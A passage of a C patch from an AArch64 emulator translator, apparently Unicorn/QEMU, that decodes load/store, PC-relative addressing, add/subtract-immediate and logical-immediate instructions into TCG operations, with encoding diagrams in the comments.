2)) { + unallocated_encoding(s); + return; + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + + /* Note that since TCG is single threaded load-acquire/store-release + * semantics require no extra if (is_lasr) { ... } handling. 
+ */ + + if (is_excl) { + if (!is_store) { + s->is_ldex = true; + gen_load_exclusive(s, rt, rt2, tcg_addr, size, is_pair); + } else { + gen_store_exclusive(s, rs, rt, rt2, tcg_addr, size, is_pair); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + if (is_store) { + do_gpr_st(s, tcg_rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, false, false); + } + if (is_pair) { + TCGv_i64 tcg_rt2 = cpu_reg(s, rt); + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, 1ULL << size); + if (is_store) { + do_gpr_st(s, tcg_rt2, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt2, tcg_addr, size, false, false); + } + } + } +} + +/* + * C3.3.5 Load register (literal) + * + * 31 30 29 27 26 25 24 23 5 4 0 + * +-----+-------+---+-----+-------------------+-------+ + * | opc | 0 1 1 | V | 0 0 | imm19 | Rt | + * +-----+-------+---+-----+-------------------+-------+ + * + * V: 1 -> vector (simd/fp) + * opc (non-vector): 00 -> 32 bit, 01 -> 64 bit, + * 10-> 32 bit signed, 11 -> prefetch + * opc (vector): 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit (11 unallocated) + */ +static void disas_ld_lit(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int64_t imm = (int32_t)(((uint32_t)sextract32(insn, 5, 19)) << 2); + bool is_vector = extract32(insn, 26, 1); + int opc = extract32(insn, 30, 2); + bool is_signed = false; + int size = 2; + TCGv_i64 tcg_rt, tcg_addr; + + if (is_vector) { + if (opc == 3) { + unallocated_encoding(s); + return; + } + size = 2 + opc; + if (!fp_access_check(s)) { + return; + } + } else { + if (opc == 3) { + /* PRFM (literal) : prefetch */ + return; + } + size = 2 + extract32(opc, 0, 1); + is_signed = extract32(opc, 1, 1); + } + + tcg_rt = cpu_reg(s, rt); + + tcg_addr = tcg_const_i64(tcg_ctx, (s->pc - 4) + imm); + if (is_vector) { + do_fp_ld(s, rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, false); + } + tcg_temp_free_i64(tcg_ctx, tcg_addr); +} + +/* + * C5.6.80 
LDNP (Load Pair - non-temporal hint)
 * C5.6.81 LDP (Load Pair - non vector)
 * C5.6.82 LDPSW (Load Pair Signed Word - non vector)
 * C5.6.176 STNP (Store Pair - non-temporal hint)
 * C5.6.177 STP (Store Pair - non vector)
 * C6.3.165 LDNP (Load Pair of SIMD&FP - non-temporal hint)
 * C6.3.165 LDP (Load Pair of SIMD&FP)
 * C6.3.284 STNP (Store Pair of SIMD&FP - non-temporal hint)
 * C6.3.284 STP (Store Pair of SIMD&FP)
 *
 *  31 30 29   27  26  25 24   23  22 21   15 14   10 9    5 4    0
 * +-----+-------+---+---+-------+---+-----------------------------+
 * | opc | 1 0 1 | V | 0 | index | L |  imm7 |  Rt2  |  Rn  | Rt   |
 * +-----+-------+---+---+-------+---+-------+-------+------+------+
 *
 * opc: LDP/STP/LDNP/STNP        00 -> 32 bit, 10 -> 64 bit
 *      LDPSW                    01
 *      LDP/STP/LDNP/STNP (SIMD) 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit
 *   V: 0 -> GPR, 1 -> Vector
 * idx: 00 -> signed offset with non-temporal hint, 01 -> post-index,
 *      10 -> signed offset, 11 -> pre-index
 *   L: 0 -> Store 1 -> Load
 *
 * Rt, Rt2 = GPR or SIMD registers to be stored
 * Rn = general purpose register containing address
 * imm7 = signed offset (multiple of 4 or 8 depending on size)
 */
static void disas_ldst_pair(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rt = extract32(insn, 0, 5);
    int rn = extract32(insn, 5, 5);
    int rt2 = extract32(insn, 10, 5);
    /* Sign-extended imm7; scaled by element size below */
    uint64_t offset = sextract64(insn, 15, 7);
    int index = extract32(insn, 23, 2);
    bool is_vector = extract32(insn, 26, 1);
    bool is_load = extract32(insn, 22, 1);
    int opc = extract32(insn, 30, 2);

    bool is_signed = false;
    bool postindex = false;
    bool wback = false;

    TCGv_i64 tcg_addr; /* calculated address */
    int size;

    if (opc == 3) {
        unallocated_encoding(s);
        return;
    }

    if (is_vector) {
        size = 2 + opc;
    } else {
        size = 2 + extract32(opc, 1, 1);
        is_signed = extract32(opc, 0, 1);
        if (!is_load && is_signed) {
            unallocated_encoding(s);
            return;
        }
    }

    switch (index) {
    case 1: /* post-index */
        postindex = true;
        wback = true;
        break;
    case 0:
        /* signed offset with "non-temporal" hint. Since we don't emulate
         * caches we don't care about hints to the cache system about
         * data access patterns, and handle this identically to plain
         * signed offset.
         */
        if (is_signed) {
            /* There is no non-temporal-hint version of LDPSW */
            unallocated_encoding(s);
            return;
        }
        postindex = false;
        break;
    case 2: /* signed offset, rn not updated */
        postindex = false;
        break;
    case 3: /* pre-index */
        postindex = false;
        wback = true;
        break;
    }

    if (is_vector && !fp_access_check(s)) {
        return;
    }

    /* imm7 is scaled by the element size */
    offset <<= size;

    if (rn == 31) {
        gen_check_sp_alignment(s);
    }

    tcg_addr = read_cpu_reg_sp(s, rn, 1);

    if (!postindex) {
        tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, offset);
    }

    /* First element of the pair */
    if (is_vector) {
        if (is_load) {
            do_fp_ld(s, rt, tcg_addr, size);
        } else {
            do_fp_st(s, rt, tcg_addr, size);
        }
    } else {
        TCGv_i64 tcg_rt = cpu_reg(s, rt);
        if (is_load) {
            do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, false);
        } else {
            do_gpr_st(s, tcg_rt, tcg_addr, size);
        }
    }
    /* Second element at +2^size */
    tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, 1ULL << size);
    if (is_vector) {
        if (is_load) {
            do_fp_ld(s, rt2, tcg_addr, size);
        } else {
            do_fp_st(s, rt2, tcg_addr, size);
        }
    } else {
        TCGv_i64 tcg_rt2 = cpu_reg(s, rt2);
        if (is_load) {
            do_gpr_ld(s, tcg_rt2, tcg_addr, size, is_signed, false);
        } else {
            do_gpr_st(s, tcg_rt2, tcg_addr, size);
        }
    }

    if (wback) {
        /* tcg_addr currently points at the second element; rewind to the
         * correct writeback value for post- vs pre-index.
         */
        if (postindex) {
            tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, offset - (1ULL << size));
        } else {
            tcg_gen_subi_i64(tcg_ctx, tcg_addr, tcg_addr, 1ULL << size);
        }
        tcg_gen_mov_i64(tcg_ctx, cpu_reg_sp(s, rn), tcg_addr);
    }
}

/*
 * C3.3.8 Load/store (immediate post-indexed)
 * C3.3.9 Load/store (immediate pre-indexed)
 * C3.3.12 Load/store (unscaled immediate)
 *
 * 31 30 29   27  26 25 24 23 22 21  20    12 11 10 9    5 4    0
 *
+----+-------+---+-----+-----+---+--------+-----+------+------+ + * |size| 1 1 1 | V | 0 0 | opc | 0 | imm9 | idx | Rn | Rt | + * +----+-------+---+-----+-----+---+--------+-----+------+------+ + * + * idx = 01 -> post-indexed, 11 pre-indexed, 00 unscaled imm. (no writeback) + 10 -> unprivileged + * V = 0 -> non-vector + * size: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64bit + * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 + */ +static void disas_ldst_reg_imm9(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm9 = sextract32(insn, 12, 9); + int opc = extract32(insn, 22, 2); + int size = extract32(insn, 30, 2); + int idx = extract32(insn, 10, 2); + bool is_signed = false; + bool is_store = false; + bool is_extended = false; + bool is_unpriv = (idx == 2); + bool is_vector = extract32(insn, 26, 1); + bool post_index; + bool writeback; + + TCGv_i64 tcg_addr; + + if (is_vector) { + size |= (opc & 2) << 1; + if (size > 4 || is_unpriv) { + unallocated_encoding(s); + return; + } + is_store = ((opc & 1) == 0); + if (!fp_access_check(s)) { + return; + } + } else { + if (size == 3 && opc == 2) { + /* PRFM - prefetch */ + if (is_unpriv) { + unallocated_encoding(s); + return; + } + return; + } + if (opc == 3 && size > 1) { + unallocated_encoding(s); + return; + } + is_store = (opc == 0); + is_signed = opc & (1<<1); + is_extended = (size < 3) && (opc & 1); + } + + switch (idx) { + case 0: + case 2: + post_index = false; + writeback = false; + break; + case 1: + post_index = true; + writeback = true; + break; + case 3: + post_index = false; + writeback = true; + break; + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + + if (!post_index) { + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, imm9); + } + + if (is_vector) { + if (is_store) { + do_fp_st(s, rt, tcg_addr, size); + } else { + do_fp_ld(s, rt, tcg_addr, 
size); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + int memidx = is_unpriv ? MMU_USER_IDX : get_mem_index(s); + + if (is_store) { + do_gpr_st_memidx(s, tcg_rt, tcg_addr, size, memidx); + } else { + do_gpr_ld_memidx(s, tcg_rt, tcg_addr, size, + is_signed, is_extended, memidx); + } + } + + if (writeback) { + TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); + if (post_index) { + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, imm9); + } + tcg_gen_mov_i64(tcg_ctx, tcg_rn, tcg_addr); + } +} + +/* + * C3.3.10 Load/store (register offset) + * + * 31 30 29 27 26 25 24 23 22 21 20 16 15 13 12 11 10 9 5 4 0 + * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ + * |size| 1 1 1 | V | 0 0 | opc | 1 | Rm | opt | S| 1 0 | Rn | Rt | + * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ + * + * For non-vector: + * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit + * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 + * For vector: + * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated + * opc<0>: 0 -> store, 1 -> load + * V: 1 -> vector/simd + * opt: extend encoding (see DecodeRegExtend) + * S: if S=1 then scale (essentially index by sizeof(size)) + * Rt: register to transfer into/out of + * Rn: address register or SP for base + * Rm: offset register or ZR for offset + */ +static void disas_ldst_reg_roffset(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int shift = extract32(insn, 12, 1); + int rm = extract32(insn, 16, 5); + int opc = extract32(insn, 22, 2); + int opt = extract32(insn, 13, 3); + int size = extract32(insn, 30, 2); + bool is_signed = false; + bool is_store = false; + bool is_extended = false; + bool is_vector = extract32(insn, 26, 1); + + TCGv_i64 tcg_rm; + TCGv_i64 tcg_addr; + + if (extract32(opt, 1, 1) == 0) { + unallocated_encoding(s); + return; + } + + if (is_vector) { + size |= (opc & 2) << 1; + if 
(size > 4) { + unallocated_encoding(s); + return; + } + is_store = !extract32(opc, 0, 1); + if (!fp_access_check(s)) { + return; + } + } else { + if (size == 3 && opc == 2) { + /* PRFM - prefetch */ + return; + } + if (opc == 3 && size > 1) { + unallocated_encoding(s); + return; + } + is_store = (opc == 0); + is_signed = extract32(opc, 1, 1); + is_extended = (size < 3) && extract32(opc, 0, 1); + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + + tcg_rm = read_cpu_reg(s, rm, 1); + ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, opt, shift ? size : 0); + + tcg_gen_add_i64(tcg_ctx, tcg_addr, tcg_addr, tcg_rm); + + if (is_vector) { + if (is_store) { + do_fp_st(s, rt, tcg_addr, size); + } else { + do_fp_ld(s, rt, tcg_addr, size); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + if (is_store) { + do_gpr_st(s, tcg_rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, is_extended); + } + } +} + +/* + * C3.3.13 Load/store (unsigned immediate) + * + * 31 30 29 27 26 25 24 23 22 21 10 9 5 + * +----+-------+---+-----+-----+------------+-------+------+ + * |size| 1 1 1 | V | 0 1 | opc | imm12 | Rn | Rt | + * +----+-------+---+-----+-----+------------+-------+------+ + * + * For non-vector: + * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit + * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 + * For vector: + * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated + * opc<0>: 0 -> store, 1 -> load + * Rn: base address register (inc SP) + * Rt: target register + */ +static void disas_ldst_reg_unsigned_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + unsigned int imm12 = extract32(insn, 10, 12); + bool is_vector = extract32(insn, 26, 1); + int size = extract32(insn, 30, 2); + int opc = extract32(insn, 22, 2); + unsigned int offset; + + TCGv_i64 tcg_addr; + + bool is_store; 
+ bool is_signed = false; + bool is_extended = false; + + if (is_vector) { + size |= (opc & 2) << 1; + if (size > 4) { + unallocated_encoding(s); + return; + } + is_store = !extract32(opc, 0, 1); + if (!fp_access_check(s)) { + return; + } + } else { + if (size == 3 && opc == 2) { + /* PRFM - prefetch */ + return; + } + if (opc == 3 && size > 1) { + unallocated_encoding(s); + return; + } + is_store = (opc == 0); + is_signed = extract32(opc, 1, 1); + is_extended = (size < 3) && extract32(opc, 0, 1); + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + offset = imm12 << size; + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, offset); + + if (is_vector) { + if (is_store) { + do_fp_st(s, rt, tcg_addr, size); + } else { + do_fp_ld(s, rt, tcg_addr, size); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + if (is_store) { + do_gpr_st(s, tcg_rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, is_extended); + } + } +} + +/* Load/store register (all forms) */ +static void disas_ldst_reg(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 24, 2)) { + case 0: + if (extract32(insn, 21, 1) == 1 && extract32(insn, 10, 2) == 2) { + disas_ldst_reg_roffset(s, insn); + } else { + /* Load/store register (unscaled immediate) + * Load/store immediate pre/post-indexed + * Load/store register unprivileged + */ + disas_ldst_reg_imm9(s, insn); + } + break; + case 1: + disas_ldst_reg_unsigned_imm(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.3.1 AdvSIMD load/store multiple structures + * + * 31 30 29 23 22 21 16 15 12 11 10 9 5 4 0 + * +---+---+---------------+---+-------------+--------+------+------+------+ + * | 0 | Q | 0 0 1 1 0 0 0 | L | 0 0 0 0 0 0 | opcode | size | Rn | Rt | + * +---+---+---------------+---+-------------+--------+------+------+------+ + * + * C3.3.2 AdvSIMD load/store multiple structures (post-indexed) + * + * 31 30 29 23 22 21 20 16 15 12 11 10 9 5 4 
0 + * +---+---+---------------+---+---+---------+--------+------+------+------+ + * | 0 | Q | 0 0 1 1 0 0 1 | L | 0 | Rm | opcode | size | Rn | Rt | + * +---+---+---------------+---+---+---------+--------+------+------+------+ + * + * Rt: first (or only) SIMD&FP register to be transferred + * Rn: base address or SP + * Rm (post-index only): post-index register (when !31) or size dependent #imm + */ +static void disas_ldst_multiple_struct(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int size = extract32(insn, 10, 2); + int opcode = extract32(insn, 12, 4); + bool is_store = !extract32(insn, 22, 1); + bool is_postidx = extract32(insn, 23, 1); + bool is_q = extract32(insn, 30, 1); + TCGv_i64 tcg_addr, tcg_rn; + + int ebytes = 1 << size; + int elements = (is_q ? 128 : 64) / (8 << size); + int rpt; /* num iterations */ + int selem; /* structure elements */ + int r; + + if (extract32(insn, 31, 1) || extract32(insn, 21, 1)) { + unallocated_encoding(s); + return; + } + + /* From the shared decode logic */ + switch (opcode) { + case 0x0: + rpt = 1; + selem = 4; + break; + case 0x2: + rpt = 4; + selem = 1; + break; + case 0x4: + rpt = 1; + selem = 3; + break; + case 0x6: + rpt = 3; + selem = 1; + break; + case 0x7: + rpt = 1; + selem = 1; + break; + case 0x8: + rpt = 1; + selem = 2; + break; + case 0xa: + rpt = 2; + selem = 1; + break; + default: + unallocated_encoding(s); + return; + } + + if (size == 3 && !is_q && selem != 1) { + /* reserved */ + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + + tcg_rn = cpu_reg_sp(s, rn); + tcg_addr = tcg_temp_new_i64(tcg_ctx); + tcg_gen_mov_i64(tcg_ctx, tcg_addr, tcg_rn); + + for (r = 0; r < rpt; r++) { + int e; + for (e = 0; e < elements; e++) { + int tt = (rt + r) % 32; + int xs; + for (xs = 0; xs < selem; xs++) { + if (is_store) { + do_vec_st(s, 
tt, e, tcg_addr, size); + } else { + do_vec_ld(s, tt, e, tcg_addr, size); + + /* For non-quad operations, setting a slice of the low + * 64 bits of the register clears the high 64 bits (in + * the ARM ARM pseudocode this is implicit in the fact + * that 'rval' is a 64 bit wide variable). We optimize + * by noticing that we only need to do this the first + * time we touch a register. + */ + if (!is_q && e == 0 && (r == 0 || xs == selem - 1)) { + clear_vec_high(s, tt); + } + } + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, ebytes); + tt = (tt + 1) % 32; + } + } + } + + if (is_postidx) { + int rm = extract32(insn, 16, 5); + if (rm == 31) { + tcg_gen_mov_i64(tcg_ctx, tcg_rn, tcg_addr); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); + } + } + tcg_temp_free_i64(tcg_ctx, tcg_addr); +} + +/* C3.3.3 AdvSIMD load/store single structure + * + * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * | 0 | Q | 0 0 1 1 0 1 0 | L R | 0 0 0 0 0 | opc | S | size | Rn | Rt | + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * + * C3.3.4 AdvSIMD load/store single structure (post-indexed) + * + * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * | 0 | Q | 0 0 1 1 0 1 1 | L R | Rm | opc | S | size | Rn | Rt | + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * + * Rt: first (or only) SIMD&FP register to be transferred + * Rn: base address or SP + * Rm (post-index only): post-index register (when !31) or size dependent #imm + * index = encoded in Q:S:size dependent on size + * + * lane_size = encoded in R, opc + * transfer width = encoded in opc, S, size + */ +static void disas_ldst_single_struct(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int size = 
extract32(insn, 10, 2); + int S = extract32(insn, 12, 1); + int opc = extract32(insn, 13, 3); + int R = extract32(insn, 21, 1); + int is_load = extract32(insn, 22, 1); + int is_postidx = extract32(insn, 23, 1); + int is_q = extract32(insn, 30, 1); + + int scale = extract32(opc, 1, 2); + int selem = (extract32(opc, 0, 1) << 1 | R) + 1; + bool replicate = false; + int index = is_q << 3 | S << 2 | size; + int ebytes, xs; + TCGv_i64 tcg_addr, tcg_rn; + + switch (scale) { + case 3: + if (!is_load || S) { + unallocated_encoding(s); + return; + } + scale = size; + replicate = true; + break; + case 0: + break; + case 1: + if (extract32(size, 0, 1)) { + unallocated_encoding(s); + return; + } + index >>= 1; + break; + case 2: + if (extract32(size, 1, 1)) { + unallocated_encoding(s); + return; + } + if (!extract32(size, 0, 1)) { + index >>= 2; + } else { + if (S) { + unallocated_encoding(s); + return; + } + index >>= 3; + scale = 3; + } + break; + default: + g_assert_not_reached(); + } + + if (!fp_access_check(s)) { + return; + } + + ebytes = 1 << scale; + + if (rn == 31) { + gen_check_sp_alignment(s); + } + + tcg_rn = cpu_reg_sp(s, rn); + tcg_addr = tcg_temp_new_i64(tcg_ctx); + tcg_gen_mov_i64(tcg_ctx, tcg_addr, tcg_rn); + + for (xs = 0; xs < selem; xs++) { + if (replicate) { + /* Load and replicate to all elements */ + uint64_t mulconst; + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(s->uc, tcg_tmp, tcg_addr, + get_mem_index(s), MO_TE + scale); + switch (scale) { + case 0: + mulconst = 0x0101010101010101ULL; + break; + case 1: + mulconst = 0x0001000100010001ULL; + break; + case 2: + mulconst = 0x0000000100000001ULL; + break; + case 3: + mulconst = 0; + break; + default: + g_assert_not_reached(); + } + if (mulconst) { + tcg_gen_muli_i64(tcg_ctx, tcg_tmp, tcg_tmp, mulconst); + } + write_vec_element(s, tcg_tmp, rt, 0, MO_64); + if (is_q) { + write_vec_element(s, tcg_tmp, rt, 1, MO_64); + } else { + clear_vec_high(s, rt); + } + 
tcg_temp_free_i64(tcg_ctx, tcg_tmp); + } else { + /* Load/store one element per register */ + if (is_load) { + do_vec_ld(s, rt, index, tcg_addr, MO_TE + scale); + } else { + do_vec_st(s, rt, index, tcg_addr, MO_TE + scale); + } + } + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, ebytes); + rt = (rt + 1) % 32; + } + + /* Post-index writeback: if Rm is 31 the incremented address is written back to Rn, otherwise Rn is advanced by Rm. */ + if (is_postidx) { + int rm = extract32(insn, 16, 5); + if (rm == 31) { + tcg_gen_mov_i64(tcg_ctx, tcg_rn, tcg_addr); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); + } + } + tcg_temp_free_i64(tcg_ctx, tcg_addr); +} + +/* C3.3 Loads and stores: top-level decoder, dispatching on insn<29:24> to the per-class load/store decoders; unhandled patterns are unallocated encodings. */ +static void disas_ldst(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 24, 6)) { + case 0x08: /* Load/store exclusive */ + disas_ldst_excl(s, insn); + break; + case 0x18: case 0x1c: /* Load register (literal) */ + disas_ld_lit(s, insn); + break; + case 0x28: case 0x29: + case 0x2c: case 0x2d: /* Load/store pair (all forms) */ + disas_ldst_pair(s, insn); + break; + case 0x38: case 0x39: + case 0x3c: case 0x3d: /* Load/store register (all forms) */ + disas_ldst_reg(s, insn); + break; + case 0x0c: /* AdvSIMD load/store multiple structures */ + disas_ldst_multiple_struct(s, insn); + break; + case 0x0d: /* AdvSIMD load/store single structure */ + disas_ldst_single_struct(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.4.6 PC-rel. 
addressing + * 31 30 29 28 24 23 5 4 0 + * +----+-------+-----------+-------------------+------+ + * | op | immlo | 1 0 0 0 0 | immhi | Rd | + * +----+-------+-----------+-------------------+------+ + */ +static void disas_pc_rel_adr(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int page, rd; + uint64_t base; + int64_t offset; + + page = extract32(insn, 31, 1); + /* SignExtend(immhi:immlo) -> offset */ + offset = (int64_t)((uint64_t)sextract32(insn, 5, 19) << 2) | extract32(insn, 29, 2); + rd = extract32(insn, 0, 5); + base = s->pc - 4; + + if (page) { + /* ADRP (page based) */ + base &= ~0xfff; + offset = ((uint64_t)offset) << 12; + } + + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), base + offset); +} + +/* + * C3.4.1 Add/subtract (immediate) + * + * 31 30 29 28 24 23 22 21 10 9 5 4 0 + * +--+--+--+-----------+-----+-------------+-----+-----+ + * |sf|op| S| 1 0 0 0 1 |shift| imm12 | Rn | Rd | + * +--+--+--+-----------+-----+-------------+-----+-----+ + * + * sf: 0 -> 32bit, 1 -> 64bit + * op: 0 -> add , 1 -> sub + * S: 1 -> set flags + * shift: 00 -> LSL imm by 0, 01 -> LSL imm by 12 + */ +static void disas_add_sub_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + uint64_t imm = extract32(insn, 10, 12); + int shift = extract32(insn, 22, 2); + bool setflags = extract32(insn, 29, 1); + bool sub_op = extract32(insn, 30, 1); + bool is_64bit = extract32(insn, 31, 1); + + TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); + TCGv_i64 tcg_rd = setflags ? 
cpu_reg(s, rd) : cpu_reg_sp(s, rd); + TCGv_i64 tcg_result; + + switch (shift) { + case 0x0: + break; + case 0x1: + imm <<= 12; + break; + default: + unallocated_encoding(s); + return; + } + + tcg_result = tcg_temp_new_i64(tcg_ctx); + if (!setflags) { + if (sub_op) { + tcg_gen_subi_i64(tcg_ctx, tcg_result, tcg_rn, imm); + } else { + tcg_gen_addi_i64(tcg_ctx, tcg_result, tcg_rn, imm); + } + } else { + TCGv_i64 tcg_imm = tcg_const_i64(tcg_ctx, imm); + if (sub_op) { + gen_sub_CC(s, is_64bit, tcg_result, tcg_rn, tcg_imm); + } else { + gen_add_CC(s, is_64bit, tcg_result, tcg_rn, tcg_imm); + } + tcg_temp_free_i64(tcg_ctx, tcg_imm); + } + + if (is_64bit) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); + } + + tcg_temp_free_i64(tcg_ctx, tcg_result); +} + +/* The input should be a value in the bottom e bits (with higher + * bits zero); returns that value replicated into every element + * of size e in a 64 bit integer. + */ +static uint64_t bitfield_replicate(uint64_t mask, unsigned int e) +{ + assert(e != 0); + while (e < 64) { + mask |= mask << e; + e *= 2; + } + return mask; +} + +/* Return a value with the bottom len bits set (where 0 < len <= 64) */ +static inline uint64_t bitmask64(unsigned int length) +{ + assert(length > 0 && length <= 64); + return ~0ULL >> (64 - length); +} + +/* Simplified variant of pseudocode DecodeBitMasks() for the case where we + * only require the wmask. Returns false if the imms/immr/immn are a reserved + * value (ie should cause a guest UNDEF exception), and true if they are + * valid, in which case the decoded bit pattern is written to result. 
+ */ +static bool logic_imm_decode_wmask(uint64_t *result, unsigned int immn, + unsigned int imms, unsigned int immr) +{ + uint64_t mask; + unsigned e, levels, s, r; + int len; + + assert(immn < 2 && imms < 64 && immr < 64); + + /* The bit patterns we create here are 64 bit patterns which + * are vectors of identical elements of size e = 2, 4, 8, 16, 32 or + * 64 bits each. Each element contains the same value: a run + * of between 1 and e-1 non-zero bits, rotated within the + * element by between 0 and e-1 bits. + * + * The element size and run length are encoded into immn (1 bit) + * and imms (6 bits) as follows: + * 64 bit elements: immn = 1, imms = (length of run - 1) + * 32 bit elements: immn = 0, imms = 0 : (length of run - 1) + * 16 bit elements: immn = 0, imms = 10 : (length of run - 1) + * 8 bit elements: immn = 0, imms = 110 : (length of run - 1) + * 4 bit elements: immn = 0, imms = 1110 : (length of run - 1) + * 2 bit elements: immn = 0, imms = 11110 : (length of run - 1) + * Notice that immn = 0, imms = 11111x is the only combination + * not covered by one of the above options; this is reserved. + * Further, all-ones is a reserved pattern. + * + * In all cases the rotation is by immr % e (and immr is 6 bits). + */ + + /* First determine the element size */ + len = 31 - clz32((immn << 6) | (~imms & 0x3f)); + if (len < 1) { + /* This is the immn == 0, imms == 0x11111x case */ + return false; + } + e = 1 << len; + + levels = e - 1; + s = imms & levels; + r = immr & levels; + + if (s == levels) { + /* mustn't be all-ones. */ + return false; + } + + /* Create the value of one element: s+1 set bits rotated + * by r within the element (which is e bits wide)... 
+ */ + mask = bitmask64(s + 1); + mask = (mask >> r) | (mask << ((e - r) & 0x3f) ); + /* ...then replicate the element over the whole 64 bit value */ + mask = bitfield_replicate(mask, e); + *result = mask; + return true; +} + +/* C3.4.4 Logical (immediate) + * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 + * +----+-----+-------------+---+------+------+------+------+ + * | sf | opc | 1 0 0 1 0 0 | N | immr | imms | Rn | Rd | + * +----+-----+-------------+---+------+------+------+------+ + */ +static void disas_logic_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, opc, is_n, immr, imms, rn, rd; + TCGv_i64 tcg_rd, tcg_rn; + uint64_t wmask; + bool is_and = false; + + sf = extract32(insn, 31, 1); + opc = extract32(insn, 29, 2); + is_n = extract32(insn, 22, 1); + immr = extract32(insn, 16, 6); + imms = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (!sf && is_n) { + unallocated_encoding(s); + return; + } + + if (opc == 0x3) { /* ANDS */ + tcg_rd = cpu_reg(s, rd); + } else { + tcg_rd = cpu_reg_sp(s, rd); + } + tcg_rn = cpu_reg(s, rn); + + if (!logic_imm_decode_wmask(&wmask, is_n, imms, immr)) { + /* some immediate field values are reserved */ + unallocated_encoding(s); + return; + } + + if (!sf) { + wmask &= 0xffffffff; + } + + switch (opc) { + case 0x3: /* ANDS */ + case 0x0: /* AND */ + 